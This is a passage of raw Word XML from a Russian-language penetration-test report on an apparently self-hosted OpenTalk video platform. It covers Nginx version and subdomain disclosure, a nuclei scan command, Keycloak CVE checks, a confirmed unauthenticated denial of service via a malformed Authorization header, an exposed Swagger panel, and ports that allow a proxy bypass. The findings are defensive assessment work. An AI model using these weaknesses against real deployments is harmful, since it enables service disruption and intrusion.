          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003A5828">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Nginx</w:t>
      </w:r>
      <w:r w:rsidR="00763E44">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1.28.3</w:t>
      </w:r>
      <w:r w:rsidR="00873ECD" w:rsidRPr="00873ECD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D80616" w:rsidRPr="00D80616">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00132FA3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00132FA3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref234287074 \r \h \t</w:instrText>
      </w:r>
      <w:r w:rsidR="00132FA3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:t>рисунок</w:t>
      </w:r>
      <w:r w:rsidR="00132FA3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.6</w:t>
      </w:r>
      <w:r w:rsidR="00132FA3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00D80616" w:rsidRPr="00D80616">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00132FA3" w:rsidRPr="00873ECD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00132FA3" w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TLS-</w:t>
      </w:r>
      <w:r w:rsidRPr="001B7E9E">
        <w:t>сертификат</w:t>
      </w:r>
      <w:r w:rsidR="00132FA3" w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001B7E9E">
        <w:t>раскрывает</w:t>
      </w:r>
      <w:r w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001B7E9E">
        <w:t>внутренние</w:t>
      </w:r>
      <w:r w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001B7E9E">
        <w:t>поддомены</w:t>
      </w:r>
      <w:r w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00132FA3" w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>accounts</w:t>
      </w:r>
      <w:r w:rsidR="00132FA3" w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00132FA3" w:rsidRPr="00132FA3">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00132FA3" w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>controller</w:t>
      </w:r>
      <w:r w:rsidR="00132FA3" w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00132FA3" w:rsidRPr="00132FA3">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00132FA3" w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00763E44">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LiveKit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00132FA3" w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00132FA3" w:rsidRPr="00132FA3">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="001B7E9E">
        <w:t>через</w:t>
      </w:r>
      <w:r w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00132FA3" w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SAN</w:t>
      </w:r>
      <w:r w:rsidR="00132FA3" w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="00132FA3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D80616" w:rsidRPr="00D80616">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00132FA3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00132FA3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref234287147 \r \h </w:instrText>
      </w:r>
      <w:r w:rsidR="00132FA3" w:rsidRPr="00132FA3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText>\</w:instrText>
      </w:r>
      <w:r w:rsidR="00132FA3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText>t</w:instrText>
      </w:r>
      <w:r w:rsidR="00132FA3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:t>рисунок</w:t>
      </w:r>
      <w:r w:rsidR="00132FA3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.5</w:t>
      </w:r>
      <w:r w:rsidR="00132FA3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00D80616" w:rsidRPr="00D80616">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00132FA3" w:rsidRPr="00132FA3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B1B8A0" w14:textId="66A04589" w:rsidR="00132FA3" w:rsidRPr="00AC3134" w:rsidRDefault="00AC3134" w:rsidP="00AC3134">
      <w:pPr>
        <w:pStyle w:val="1a"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Ref234287369"/>
      <w:r>
        <w:t xml:space="preserve">Сканирование через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nuclei</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="271EBD09" w14:textId="4EF0F047" w:rsidR="00AC3134" w:rsidRDefault="00132FA3" w:rsidP="00132FA3">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00132FA3">
        <w:t xml:space="preserve">nuclei -target </w:t>
      </w:r>
      <w:hyperlink r:id="rId28" w:history="1">
        <w:r w:rsidR="00AC3134" w:rsidRPr="009B1ADB">
          <w:rPr>
            <w:rStyle w:val="af1"/>
          </w:rPr>
          <w:t>https://opentalk.local</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="42FA8863" w14:textId="77777777" w:rsidR="00AC3134" w:rsidRPr="00AC3134" w:rsidRDefault="00AC3134" w:rsidP="00132FA3">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24410E37" w14:textId="77777777" w:rsidR="00132FA3" w:rsidRDefault="00873ECD" w:rsidP="00132FA3">
      <w:pPr>
        <w:pStyle w:val="1f6"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B0EB400" wp14:editId="6A1BD6BA">
            <wp:extent cx="5762336" cy="260076"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="4518826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268" cy="29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84C9" w14:textId="45726092" w:rsidR="00132FA3" w:rsidRDefault="00132FA3" w:rsidP="002B7007">
      <w:pPr>
        <w:pStyle w:val="18"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Ref234287147"/>
      <w:r w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TLS-</w:t>
      </w:r>
      <w:r>
        <w:t>сертификаты</w:t>
      </w:r>
      <w:r w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="7DC65F7F" w14:textId="77777777" w:rsidR="00132FA3" w:rsidRDefault="001B7E9E" w:rsidP="00132FA3">
      <w:pPr>
        <w:pStyle w:val="1f6"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D7055C8" wp14:editId="50BD5087">
            <wp:extent cx="5340350" cy="475615"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="488254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3F68" w14:textId="2BD06925" w:rsidR="00132FA3" w:rsidRPr="00132FA3" w:rsidRDefault="00132FA3" w:rsidP="00132FA3">
      <w:pPr>
        <w:pStyle w:val="18"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Ref234287074"/>
      <w:r>
        <w:t>Версия</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003A5828">
        <w:t>Nginx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B7E9E">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="0AC8DC51" w14:textId="3830E62D" w:rsidR="00AC3134" w:rsidRDefault="001B7E9E" w:rsidP="002B7007">
      <w:pPr>
        <w:pStyle w:val="114"/>
      </w:pPr>
      <w:r w:rsidRPr="00C27C90">
        <w:lastRenderedPageBreak/>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00AC3134">
        <w:t>З</w:t>
      </w:r>
      <w:r w:rsidRPr="001B7E9E">
        <w:t>ащитные заголовки не настроены, версия и внутренняя структура</w:t>
      </w:r>
      <w:r w:rsidR="00AC3134">
        <w:t xml:space="preserve"> частично</w:t>
      </w:r>
      <w:r w:rsidRPr="001B7E9E">
        <w:t xml:space="preserve"> раскрыва</w:t>
      </w:r>
      <w:r w:rsidR="00AC3134">
        <w:t>ю</w:t>
      </w:r>
      <w:r w:rsidRPr="001B7E9E">
        <w:t>тся</w:t>
      </w:r>
      <w:r w:rsidR="00AC3134">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="001B7E9E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AC3134">
        <w:t>К</w:t>
      </w:r>
      <w:r w:rsidRPr="001B7E9E">
        <w:t>ритических уязвимостей нет.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF7DC7E" w14:textId="77777777" w:rsidR="00AC3134" w:rsidRDefault="00AC3134" w:rsidP="002B7007">
      <w:pPr>
        <w:pStyle w:val="114"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F5D7ADE" w14:textId="59818F26" w:rsidR="00AC3134" w:rsidRDefault="000534E5" w:rsidP="00AC3134">
      <w:pPr>
        <w:pStyle w:val="130"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Контейнер </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00763E44">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Keycloak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001F04CB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BA0D4D" w14:textId="26A75B6C" w:rsidR="00AC3134" w:rsidRDefault="00763E44" w:rsidP="00AC3134">
      <w:pPr>
        <w:pStyle w:val="114"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Keycloak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:r w:rsidR="00AC3134">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AC3134" w:rsidRPr="00AC3134">
        <w:t>единственный внешне достижимый компонент с логикой аутентификации, поэтому подвергнут наиболее полной проверке из всех подсистем.</w:t>
      </w:r>
      <w:r w:rsidR="00AC3134">
        <w:t xml:space="preserve"> Было </w:t>
      </w:r>
      <w:r w:rsidR="00AC3134" w:rsidRPr="00AC3134">
        <w:t xml:space="preserve">проверено пять уязвимостей. Попытка обхода </w:t>
      </w:r>
      <w:r w:rsidR="00AC3134" w:rsidRPr="00AC3134">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AC3134" w:rsidRPr="00AC3134">
        <w:t>redirect_uri</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AC3134" w:rsidRPr="00AC3134">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="00AC3134" w:rsidRPr="00AC3134">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000534E5" w:rsidRPr="00AC3134">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="00AC3134" w:rsidRPr="00AC3134">
        <w:t>CVE-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00AC3134" w:rsidRPr="00AC3134">
        <w:t>2026-7504</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="000534E5" w:rsidRPr="00AC3134">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="00AC3134" w:rsidRPr="00AC3134">
        <w:t xml:space="preserve"> не удалась</w:t>
      </w:r>
      <w:r w:rsidR="00AC3134">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00AC3134" w:rsidRPr="00AC3134">
        <w:t xml:space="preserve"> в настройках клиентов не используется </w:t>
      </w:r>
      <w:r w:rsidR="00AC3134" w:rsidRPr="00AC3134">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AC3134" w:rsidRPr="00AC3134">
        <w:t>wildcard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000534E5" w:rsidRPr="00AC3134">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="00AC3134" w:rsidRPr="00AC3134">
        <w:t xml:space="preserve">. Попытка повышения привилегий через </w:t>
      </w:r>
      <w:r w:rsidR="00AC3134" w:rsidRPr="00AC3134">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AC3134" w:rsidRPr="00AC3134">
        <w:t>token</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AC3134" w:rsidRPr="00AC3134">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AC3134" w:rsidRPr="00AC3134">
        <w:t>exchange</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AC3134" w:rsidRPr="00AC3134">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="00AC3134" w:rsidRPr="00AC3134">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000534E5" w:rsidRPr="00AC3134">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="00AC3134" w:rsidRPr="00AC3134">
        <w:t>CVE-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00AC3134" w:rsidRPr="00AC3134">
        <w:t>2026-9704</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="000534E5" w:rsidRPr="00AC3134">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="00AC3134" w:rsidRPr="00AC3134">
        <w:t xml:space="preserve"> с намеренно увеличенным JWT-токеном была отклонена сервером с кодом ошибки 400. Отправка некорректного заголовка </w:t>
      </w:r>
      <w:r w:rsidR="00AC3134" w:rsidRPr="00AC3134">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AC3134" w:rsidRPr="00AC3134">
        <w:t>Authorization</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AC3134" w:rsidRPr="00AC3134">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="00AC3134" w:rsidRPr="00AC3134">
        <w:t xml:space="preserve"> на </w:t>
      </w:r>
      <w:r w:rsidR="00AC3134">
        <w:t xml:space="preserve">конечной точке </w:t>
      </w:r>
      <w:r w:rsidR="00AC3134" w:rsidRPr="00AC3134">
        <w:t xml:space="preserve">регистрации клиента вызвала необработанную ошибку и сбой в обработке запроса </w:t>
      </w:r>
      <w:r w:rsidR="000534E5" w:rsidRPr="00AC3134">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="00AC3134" w:rsidRPr="00AC3134">
        <w:t>CVE-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00AC3134" w:rsidRPr="00AC3134">
        <w:t>2026-9803</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00AC3134" w:rsidRPr="00AC3134">
        <w:t>/0707</w:t>
      </w:r>
      <w:r w:rsidR="000534E5" w:rsidRPr="00AC3134">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="00AC3134" w:rsidRPr="00AC3134">
        <w:t xml:space="preserve">. У одного клиента включён режим ROPC, но с ограниченным набором прав. Атака </w:t>
      </w:r>
      <w:r w:rsidR="00AC3134" w:rsidRPr="00AC3134">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="00AC3134" w:rsidRPr="00AC3134">
        <w:t xml:space="preserve">JWT </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AC3134" w:rsidRPr="00AC3134">
        <w:t>alg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AC3134" w:rsidRPr="00AC3134">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AC3134" w:rsidRPr="00AC3134">
        <w:t>confusion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AC3134" w:rsidRPr="00AC3134">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="00AC3134" w:rsidRPr="00AC3134">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000534E5" w:rsidRPr="00AC3134">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="00AC3134" w:rsidRPr="00AC3134">
        <w:t>CVE-</w:t>
      </w:r>
      <w:r w:rsidR="000534E5" w:rsidRPr="00AC3134">
        <w:t>2026–11800</w:t>
      </w:r>
      <w:r w:rsidR="000534E5" w:rsidRPr="00AC3134">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="00AC3134" w:rsidRPr="00AC3134">
        <w:t xml:space="preserve"> неприменима, так как соответствующий механизм в системе не используется.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDD8144" w14:textId="0892E6AA" w:rsidR="000534E5" w:rsidRDefault="000534E5" w:rsidP="00AC3134">
      <w:pPr>
        <w:pStyle w:val="114"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>В заключении п</w:t>
      </w:r>
      <w:r w:rsidRPr="000534E5">
        <w:t>одтверждена одна работающая уязвимость</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="000534E5">
        <w:t xml:space="preserve"> отказ в обслуживании, который срабатывает без предварительной аутентификации и без дополнительных условий. Остальные проверенные уязвимости не воспроизводятся.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7504129E" w14:textId="19AAF4EE" w:rsidR="000534E5" w:rsidRPr="000534E5" w:rsidRDefault="000534E5" w:rsidP="000534E5">
      <w:pPr>
        <w:pStyle w:val="130"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Контейнер </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Container</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658DD788" w14:textId="5FFD6A71" w:rsidR="000534E5" w:rsidRPr="00C54DEE" w:rsidRDefault="000534E5" w:rsidP="000534E5">
      <w:pPr>
        <w:pStyle w:val="114"/>
      </w:pPr>
      <w:r w:rsidRPr="000534E5">
        <w:t xml:space="preserve">Обнаружено, что панель </w:t>
      </w:r>
      <w:r w:rsidRPr="000534E5">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000534E5">
        <w:t>Swagger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000534E5">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="000534E5">
        <w:t xml:space="preserve"> доступна без авторизации и показывает структуру API. Порты контроллера, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00763E44">
        <w:t>Keycloak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00763E44">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00763E44" w:rsidRPr="000534E5">
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="000534E5">
        <w:t xml:space="preserve"> веб-интерфейса открыты на всех сетевых </w:t>
      </w:r>
      <w:r w:rsidR="00763E44" w:rsidRPr="000534E5">
        <w:t>интерфейсах,</w:t>
      </w:r>
      <w:r w:rsidRPr="000534E5">
        <w:t xml:space="preserve"> а не только </w:t>
      </w:r>
      <w:r>
        <w:t>в локальной сети</w:t>
      </w:r>
      <w:r w:rsidRPr="000534E5">
        <w:t xml:space="preserve">, поэтому теоретически возможен доступ к ним в обход </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003A5828">
        <w:t>Nginx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000534E5">
        <w:t>. Версия сборки контроллера через API не</w:t>
      </w:r>
      <w:r w:rsidR="00763E44" w:rsidRPr="00763E44">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000534E5">
        <w:t>раскрывается.</w:t>
      </w:r>
      <w:r w:rsidR="00763E44" w:rsidRPr="00763E44">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D87C91" w:rsidRPr="00D87C91">
        <w:t>В результате теоретический обход прокси-сервера</w:t>
      </w:r>
      <w:r w:rsidR="00D87C91">
        <w:t xml:space="preserve"> возможен</w:t>
      </w:r>
      <w:r w:rsidR="008D0061" w:rsidRPr="00C54DEE">
        <w:t>.</w:t>
      </w:r>
    </w:p>
